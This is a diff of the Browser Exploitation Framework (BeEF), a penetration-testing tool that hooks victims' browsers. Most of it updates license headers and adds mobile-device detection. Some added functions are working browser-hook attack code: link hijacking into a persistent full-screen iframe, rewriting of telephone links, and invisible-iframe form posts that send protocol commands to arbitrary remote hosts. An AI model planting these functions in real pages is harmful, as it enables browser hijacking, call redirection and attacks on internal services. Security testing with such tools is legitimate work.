-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF  
 module Filters

core/filters/page.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters

core/hbmanager.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module HBManager

core/loader.rb

@@ -1,17 +1,8 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
 
 # @note Include here all the gems we are using
 require 'rubygems'

core/main/client/are.js

@@ -0,0 +1,47 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.are = {
+  init:function(){
+   var Jools = require('jools');
+   this.ruleEngine = new Jools();
+  },
+  send:function(module){
+    // there will probably be some other stuff here before things are finished
+    this.commands.push(module);
+  },
+  execute:function(inputs){
+    this.rulesEngine.execute(input);
+  },
+  cache_modules:function(modules){},
+  rules:[
+    {
+      'name':"exec_no_input",
+      'condition':function(command,browser){
+          //need to figure out how to handle the inputs
+          return (!command['inputs'] || command['inputs'].length == 0)
+       },
+      'consequence':function(command,browser){}
+    },
+    {
+      'name':"module_has_sibling",
+      'condition':function(command,commands){
+        return false;
+      },
+      'consequence':function(command,commands){}
+    },
+    {
+      'name':"module_depends_on_module",
+      'condition':function(command,commands){
+        return false;
+      },
+      'consequence':function(command,commands){}
+    }
+  ],
+  commands:[],
+  results:[]
+};
+beef.regCmp("beef.are");

core/main/client/beef.js

@@ -1,27 +1,16 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * BeEF JS Library <%= @beef_version %>
- * http://beef.googlecode.com/
+ * Register the BeEF JS on the window object.
  */
 
 $j = jQuery.noConflict();
 
-//<%= @beef_hook_session_name %>='<%= @beef_hook_session_id %>';
-
 if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 	
 	var BeefJS = {

core/main/client/browser/cookie.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.browser.cookie
  * 

core/main/client/browser/popup.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.browser.popup
  * 
@@ -23,7 +14,7 @@
  */
 beef.browser.popup = {
 	
-		blocker_enbabled: function ()
+		blocker_enabled: function ()
 		{
 			screenParams = beef.browser.getScreenSize();
 			var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');

core/main/client/dom.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.dom
  *
@@ -118,6 +109,25 @@ beef.dom = {
 		return iframe;
 	},
 
+    /**
+     * Load the link (href value) in an overlay foreground iFrame.
+     * The BeEF hook continues to run in background.
+     * NOTE: if the target link is returning X-Frame-Options deny/same-origin or uses
+     * Framebusting techniques, this will not work.
+     */
+    persistentIframe: function(){
+        $j('a').click(function(e) {
+            if ($j(this).attr('href') != '')
+            {
+                e.preventDefault();
+                beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+                $j(document).attr('title', $j(this).html());
+                document.body.scroll = "no";
+                document.documentElement.style.overflow = 'hidden';
+            }
+        });
+    },
+	
 	/**
      * Create a form element with the specified parameters, appending it to the DOM if append == true
 	 * @param: {Hash} params: params to be applied to the form element
@@ -194,6 +204,31 @@ beef.dom = {
 		return count;
 	},
 
+	/**
+	 * Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number
+	 * @param: {String} new_number: the new link telephone number to be written
+	 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
+	 * @return: {Number} the amount of links found in the DOM and rewritten.
+	 */
+	rewriteTelLinks: function(new_number, selector) {
+
+		var count = 0;
+		var re = new RegExp("tel:/?/?.*", "gi");
+		var sel = (selector == null) ? 'a' : selector;
+
+		$j(sel).each(function() {
+			if ($j(this).attr('href') != null) {
+				var url = $j(this).attr('href');
+				if (url.match(re)) {
+					$j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; });
+					count++;
+				}
+			}
+		});
+
+		return count;
+	},
+
     /**
      *  Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed
      * @params: {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]
@@ -315,6 +350,30 @@ beef.dom = {
         formXsrf.submit();
 
         return iframeXsrf;
+    },
+
+    /**
+     * Create an invisible iFrame with a form inside, and POST the form in plain-text. Used for inter-protocol exploitation.
+     * @params: {String} rhost: remote host ip/domain
+     * @params: {String} rport: remote port
+     * @params: {String} commands: protocol commands to be executed by the remote host:port service
+     */
+    createIframeIpecForm: function(rhost, rport, commands){
+        var iframeIpec = beef.dom.createInvisibleIframe();
+
+        var formIpec = document.createElement('form');
+        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+'/index.html');
+        formIpec.setAttribute('method',  'POST');
+        formIpec.setAttribute('enctype', 'multipart/form-data');
+
+        input = document.createElement('textarea');
+        input.setAttribute('name', Math.random().toString(36).substring(5));
+        input.value = commands;
+        formIpec.appendChild(input);
+        iframeIpec.contentWindow.document.body.appendChild(formIpec);
+        formIpec.submit();
+
+        return iframeIpec;
     }
 
 };

core/main/client/encode/base64.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // Base64 code from http://stackoverflow.com/questions/3774622/how-to-base64-encode-inside-of-javascript/3774662#3774662
 
 beef.encode = {};

core/main/client/encode/json.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // Json code from Brantlye Harris-- http://code.google.com/p/jquery-json/
 
 beef.encode.json = {

core/main/client/geolocation.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.geolocation
  *

core/main/client/hardware.js

@@ -0,0 +1,91 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.hardware = {
+
+	ua: navigator.userAgent,
+
+	isNokia: function() {
+		return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
+	},
+
+	isZune: function() {
+		return (this.ua.match('ZuneWP7')) ? true : false;
+	},
+
+	isHtc: function() {
+		return (this.ua.match('HTC')) ? true : false;
+	},
+
+	isEricsson: function() {
+		return (this.ua.match('Ericsson')) ? true : false;
+	},
+
+	isMotorola: function() {
+		return (this.ua.match('Motorola')) ? true : false;
+	},
+
+	isGoogle: function() {
+		return (this.ua.match('Nexus One')) ? true : false;
+	},
+
+        /**
+         * Returns true if the browser is on a Mobile Phone
+         * @return: {Boolean} true or false
+         *
+         * @example: if(beef.browser.isMobilePhone()) { ... }
+         **/
+        isMobilePhone: function() {
+            return DetectMobileQuick();
+        },
+
+	getMobileName: function() {
+                var ua = navigator.userAgent.toLowerCase();
+                if(DetectIphone())              { return "iPhone"};
+                if(DetectIpod())                { return "iPod Touch"};
+                if(DetectIpad())                { return "iPad"};
+		if (this.isHtc())               { return 'HTC'};
+		if (this.isMotorola())          { return 'Motorola'};
+		if (this.isZune())              { return 'Zune'};
+		if (this.isGoogle())            { return 'Google Nexus One'};
+		if (this.isEricsson())          { return 'Ericsson'};
+                if(DetectAndroidPhone())        { return "Android Phone"};
+                if(DetectAndroidTablet())       { return "Android Tablet"};
+                if(DetectS60OssBrowser())       { return "Nokia S60 Open Source"};
+                if(ua.search(deviceS60) > -1)   { return "Nokia S60"};
+                if(ua.search(deviceS70) > -1)   { return "Nokia S70"};
+                if(ua.search(deviceS80) > -1)   { return "Nokia S80"};
+                if(ua.search(deviceS90) > -1)   { return "Nokia S90"};
+                if(ua.search(deviceSymbian) > -1)   { return "Nokia Symbian"};
+		if (this.isNokia())             { return 'Nokia'};
+                if(DetectWindowsPhone7())       { return "Windows Phone 7"};
+                if(DetectWindowsMobile())       { return "Windows Mobile"};
+                if(DetectBlackBerryTablet())    { return "BlackBerry Tablet"};
+                if(DetectBlackBerryWebKit())    { return "BlackBerry OS 6"};
+                if(DetectBlackBerryTouch())     { return "BlackBerry Touch"};
+                if(DetectBlackBerryHigh())      { return "BlackBerry OS 5"};
+                if(DetectBlackBerry())          { return "BlackBerry"};
+                if(DetectPalmOS())              { return "Palm OS"};
+                if(DetectPalmWebOS())           { return "Palm Web OS"};
+                if(DetectGarminNuvifone())      { return "Gamin Nuvifone"};
+                if(DetectArchos())              { return "Archos"}
+                if(DetectBrewDevice())          { return "Brew"};
+                if(DetectDangerHiptop())        { return "Danger Hiptop"};
+                if(DetectMaemoTablet())         { return "Maemo Tablet"};
+                if(DetectSonyMylo())            { return "Sony Mylo"};
+                if(DetectAmazonSilk())          { return "Kindle Fire"};
+                if(DetectKindle())              { return "Kindle"};
+                if(DetectSonyPlaystation())                 { return "Playstation" };
+                if(ua.search(deviceNintendoDs) > -1)        { return "Nintendo DS"};
+                if(ua.search(deviceWii) > -1)               { return "Nintendo Wii"};
+                if(ua.search(deviceNintendo) > -1)          { return "Nintendo"};
+                if(DetectXbox())                            { return "Xbox"};
+
+		return 'Unknown';
+	}
+};
+
+beef.regCmp('beef.net.hardware');

core/main/client/init.js

@@ -1,23 +1,18 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
 
-// if beef.pageIsLoaded is true, then this JS has been loaded >1 times 
-// and will have a new session id. The new session id will need to know
-// the brwoser details. So sendback the browser details again.
-
+/**
+ * @literal object: beef.init
+ * Contains the beef_init() method which starts the BeEF client-side
+ * logic. Also, it overrides the 'onpopstate' and 'onclose' events on the windows object.
+ *
+ * If beef.pageIsLoaded is true, then this JS has been loaded >1 times
+ * and will have a new session id. The new session id will need to know
+ * the brwoser details. So sendback the browser details again.
+ */
 BEEFHOOK = beef.session.get_hook_session_id();
 
 if (beef.pageIsLoaded) {
@@ -58,6 +53,13 @@ window.onclose = function (event) {
     }
 };
 
+/**
+ * Starts the polling mechanism, and initialize various components:
+ *  - browser details (see browser.js) are sent back to the "/init" handler
+ *  - the polling starts (checks for new commands, and execute them)
+ *  - the logger component is initialized (see logger.js)
+ *  - the Autorun Engine is initialized (see are.js)
+ */
 function beef_init() {
     if (!beef.pageIsLoaded) {
         beef.pageIsLoaded = true;
@@ -66,14 +68,13 @@ function beef_init() {
             beef.net.browser_details();
             beef.updater.execute_commands();
             beef.logger.start();
-
-        }
-        else {
+            beef.are.init();
+        }else {
             beef.net.browser_details();
             beef.updater.execute_commands();
             beef.updater.check();
             beef.logger.start();
+            beef.are.init();
         }
-
     }
 }

core/main/client/lib/evercookie.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*
  * evercookie 0.4 (10/13/2010) -- extremely persistent cookies
  *

core/main/client/lib/mdetect.js

@@ -0,0 +1,706 @@
+
+/* *******************************************
+// Copyright 2010-2012, Anthony Hand
+// mdetect : http://code.google.com/p/mobileesp/source/browse/JavaScript/mdetect.js r215
+// LICENSE INFORMATION
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//        http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing,
+// software distributed under the License is distributed on an
+// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
+// either express or implied. See the License for the specific
+// language governing permissions and limitations under the License.
+// *******************************************
+*/
+
+var isIphone = false;
+var isAndroidPhone = false;
+var isTierTablet = false;
+var isTierIphone = false;
+var isTierRichCss = false;
+var isTierGenericMobile = false;
+
+var engineWebKit = "webkit";
+var deviceIphone = "iphone";
+var deviceIpod = "ipod";
+var deviceIpad = "ipad";
+var deviceMacPpc = "macintosh"; //Used for disambiguation
+
+var deviceAndroid = "android";
+var deviceGoogleTV = "googletv";
+var deviceXoom = "xoom"; //Motorola Xoom
+var deviceHtcFlyer = "htc_flyer"; //HTC Flyer
+
+var deviceNuvifone = "nuvifone"; //Garmin Nuvifone
+
+var deviceSymbian = "symbian";
+var deviceS60 = "series60";
+var deviceS70 = "series70";
+var deviceS80 = "series80";
+var deviceS90 = "series90";
+
+var deviceWinPhone7 = "windows phone os 7";
+var deviceWinMob = "windows ce";
+var deviceWindows = "windows";
+var deviceIeMob = "iemobile";
+var devicePpc = "ppc"; //Stands for PocketPC
+var enginePie = "wm5 pie";  //An old Windows Mobile
+
+var deviceBB = "blackberry";
+var vndRIM = "vnd.rim"; //Detectable when BB devices emulate IE or Firefox
+var deviceBBStorm = "blackberry95"; //Storm 1 and 2
+var deviceBBBold = "blackberry97"; //Bold 97x0 (non-touch)
+var deviceBBBoldTouch = "blackberry 99"; //Bold 99x0 (touchscreen)
+var deviceBBTour = "blackberry96"; //Tour
+var deviceBBCurve = "blackberry89"; //Curve 2
+var deviceBBCurveTouch = "blackberry 938"; //Curve Touch 9380
+var deviceBBTorch = "blackberry 98"; //Torch
+var deviceBBPlaybook = "playbook"; //PlayBook tablet
+
+var devicePalm = "palm";
+var deviceWebOS = "webos"; //For Palm's line of WebOS devices
+var deviceWebOShp = "hpwos"; //For HP's line of WebOS devices
+
+var engineBlazer = "blazer"; //Old Palm browser
+var engineXiino = "xiino";
+
+var deviceKindle = "kindle"; //Amazon Kindle, eInk one
+var engineSilk = "silk"; //Amazon's accelerated Silk browser for Kindle Fire
+
+var vndwap = "vnd.wap";
+var wml = "wml";
+
+var deviceTablet = "tablet"; //Generic term for slate and tablet devices
+var deviceBrew = "brew";
+var deviceDanger = "danger";
+var deviceHiptop = "hiptop";
+var devicePlaystation = "playstation";
+var deviceNintendoDs = "nitro";
+var deviceNintendo = "nintendo";
+var deviceWii = "wii";
+var deviceXbox = "xbox";
+var deviceArchos = "archos";
+
+var engineOpera = "opera"; //Popular browser
+var engineNetfront = "netfront"; //Common embedded OS browser
+var engineUpBrowser = "up.browser"; //common on some phones
+var engineOpenWeb = "openweb"; //Transcoding by OpenWave server
+var deviceMidp = "midp"; //a mobile Java technology
+var uplink = "up.link";
+var engineTelecaQ = 'teleca q'; //a modern feature phone browser
+
+var devicePda = "pda";
+var mini = "mini";  //Some mobile browsers put 'mini' in their names.
+var mobile = "mobile"; //Some mobile browsers put 'mobile' in their user agent strings.
+var mobi = "mobi"; //Some mobile browsers put 'mobi' in their user agent strings.
+
+var maemo = "maemo";
+var linux = "linux";
+var qtembedded = "qt embedded"; //for Sony Mylo and others
+var mylocom2 = "com2"; //for Sony Mylo also
+
+var manuSonyEricsson = "sonyericsson";
+var manuericsson = "ericsson";
+var manuSamsung1 = "sec-sgh";
+var manuSony = "sony";
+var manuHtc = "htc"; //Popular Android and WinMo manufacturer
+
+var svcDocomo = "docomo";
+var svcKddi = "kddi";
+var svcVodafone = "vodafone";
+
+var disUpdate = "update"; //pda vs. update
+
+var uagent = "";
+if (navigator && navigator.userAgent)
+    uagent = navigator.userAgent.toLowerCase();
+
+function DetectIphone()
+{
+   if (uagent.search(deviceIphone) > -1)
+   {
+      if (DetectIpad() || DetectIpod())
+         return false;
+      else
+         return true;
+   }
+   else
+      return false;
+}
+
+function DetectIpod()
+{
+   if (uagent.search(deviceIpod) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectIpad()
+{
+   if (uagent.search(deviceIpad) > -1  && DetectWebkit())
+      return true;
+   else
+      return false;
+}
+
+function DetectIphoneOrIpod()
+{
+   if (uagent.search(deviceIphone) > -1 ||
+       uagent.search(deviceIpod) > -1)
+       return true;
+    else
+       return false;
+}
+
+function DetectIos()
+{
+   if (DetectIphoneOrIpod() || DetectIpad())
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroid()
+{
+   if ((uagent.search(deviceAndroid) > -1) || DetectGoogleTV())
+      return true;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroidPhone()
+{
+   if (DetectAndroid() && (uagent.search(mobile) > -1))
+      return true;
+   if (DetectOperaAndroidPhone())
+      return true;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroidTablet()
+{
+   if (!DetectAndroid())
+      return false;
+
+   if (DetectOperaMobile())
+      return false;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return false;
+
+   if (uagent.search(mobile) > -1)
+      return false;
+   else
+      return true;
+}
+
+
+function DetectAndroidWebKit()
+{
+   if (DetectAndroid() && DetectWebkit())
+      return true;
+   else
+      return false;
+}
+
+
+function DetectGoogleTV()
+{
+   if (uagent.search(deviceGoogleTV) > -1)
+      return true;
+   else
+      return false;
+}
+
+
+function DetectWebkit()
+{
+   if (uagent.search(engineWebKit) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectS60OssBrowser()
+{
+   if (DetectWebkit())
+   {
+     if ((uagent.search(deviceS60) > -1 ||
+          uagent.search(deviceSymbian) > -1))
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectSymbianOS()
+{
+   if (uagent.search(deviceSymbian) > -1 ||
+       uagent.search(deviceS60) > -1 ||
+       uagent.search(deviceS70) > -1 ||
+       uagent.search(deviceS80) > -1 ||
+       uagent.search(deviceS90) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWindowsPhone7()
+{
+   if (uagent.search(deviceWinPhone7) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWindowsMobile()
+{
+   if (DetectWindowsPhone7())
+      return false;
+   if (uagent.search(deviceWinMob) > -1 ||
+       uagent.search(deviceIeMob) > -1 ||
+       uagent.search(enginePie) > -1)
+      return true;
+   if ((uagent.search(devicePpc) > -1) &&
+       !(uagent.search(deviceMacPpc) > -1))
+      return true;
+   if (uagent.search(manuHtc) > -1 &&
+       uagent.search(deviceWindows) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerry()
+{
+   if (uagent.search(deviceBB) > -1)
+      return true;
+   if (uagent.search(vndRIM) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryTablet()
+{
+   if (uagent.search(deviceBBPlaybook) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryWebKit()
+{
+   if (DetectBlackBerry() &&
+       uagent.search(engineWebKit) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryTouch()
+{
+   if (DetectBlackBerry() &&
+        ((uagent.search(deviceBBStorm) > -1) ||
+        (uagent.search(deviceBBTorch) > -1) ||
+        (uagent.search(deviceBBBoldTouch) > -1) ||
+        (uagent.search(deviceBBCurveTouch) > -1) ))
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryHigh()
+{
+   if (DetectBlackBerryWebKit())
+      return false;
+   if (DetectBlackBerry())
+   {
+     if (DetectBlackBerryTouch() ||
+        uagent.search(deviceBBBold) > -1 ||
+        uagent.search(deviceBBTour) > -1 ||
+        uagent.search(deviceBBCurve) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectBlackBerryLow()
+{
+   if (DetectBlackBerry())
+   {
+     if (DetectBlackBerryHigh() || DetectBlackBerryWebKit())
+        return false;
+     else
+        return true;
+   }
+   else
+      return false;
+}
+
+
+function DetectPalmOS()
+{
+   if (uagent.search(devicePalm) > -1 ||
+       uagent.search(engineBlazer) > -1 ||
+       uagent.search(engineXiino) > -1)
+   {
+     if (DetectPalmWebOS())
+        return false;
+     else
+        return true;
+   }
+   else
+      return false;
+}
+
+function DetectPalmWebOS()
+{
+   if (uagent.search(deviceWebOS) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWebOSTablet()
+{
+   if (uagent.search(deviceWebOShp) > -1 &&
+       uagent.search(deviceTablet) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectGarminNuvifone()
+{
+   if (uagent.search(deviceNuvifone) > -1)
+      return true;
+   else
+      return false;
+}
+
+
+function DetectSmartphone()
+{
+   if (DetectIphoneOrIpod()
+      || DetectAndroidPhone()
+      || DetectS60OssBrowser()
+      || DetectSymbianOS()
+      || DetectWindowsMobile()
+      || DetectWindowsPhone7()
+      || DetectBlackBerry()
+      || DetectPalmWebOS()
+      || DetectPalmOS()
+      || DetectGarminNuvifone())
+      return true;
+
+   return false;
+};
+
+function DetectArchos()
+{
+   if (uagent.search(deviceArchos) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBrewDevice()
+{
+   if (uagent.search(deviceBrew) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectDangerHiptop()
+{
+   if (uagent.search(deviceDanger) > -1 ||
+       uagent.search(deviceHiptop) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectMaemoTablet()
+{
+   if (uagent.search(maemo) > -1)
+      return true;
+   if ((uagent.search(linux) > -1)
+       && (uagent.search(deviceTablet) > -1)
+       && !DetectWebOSTablet()
+       && !DetectAndroid())
+      return true;
+   else
+      return false;
+}
+
+function DetectSonyMylo()
+{
+   if (uagent.search(manuSony) > -1)
+   {
+     if (uagent.search(qtembedded) > -1 ||
+         uagent.search(mylocom2) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectOperaMobile()
+{
+   if (uagent.search(engineOpera) > -1)
+   {
+     if (uagent.search(mini) > -1 ||
+         uagent.search(mobi) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectOperaAndroidPhone()
+{
+   if ((uagent.search(engineOpera) > -1) &&
+      (uagent.search(deviceAndroid) > -1) &&
+      (uagent.search(mobi) > -1))
+      return true;
+   else
+      return false;
+}
+
+function DetectOperaAndroidTablet()
+{
+   if ((uagent.search(engineOpera) > -1) &&
+      (uagent.search(deviceAndroid) > -1) &&
